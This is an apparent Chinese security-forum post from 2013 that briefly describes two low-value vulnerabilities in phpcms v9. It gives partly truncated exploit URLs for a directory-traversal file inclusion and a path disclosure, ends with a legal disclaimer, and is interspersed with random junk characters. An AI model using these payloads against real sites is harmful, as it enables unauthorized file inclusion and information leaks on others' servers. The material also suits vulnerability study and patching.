中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
9 u# Z5 a+ f. `3 L+ \$ g
/ B1 y6 ^* o9 d/ X( e; C/ { e9 l
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
, j. b. _, ] S
! O$ b" C* z* |- C
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
5 T3 K* O3 z: s6 e$ |8 K& E
$ T7 s6 L: t5 a, i( i, Q
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
+ D1 v( ~6 T2 ?* a9 u
7 U. z( K7 Q( ?$ q6 Y
#暴路径
7 g$ D: H) m" K1 |1 M; P
$ }6 r( W6 k" b0 r( V* T+ }
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
& l( p$ H4 I8 K) q3 ?( V
! }7 {$ `0 S6 C: A
; h4 d+ b, q& @2 [- n: q& P
, r/ _. j3 p7 G3 V& l9 t
+1
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2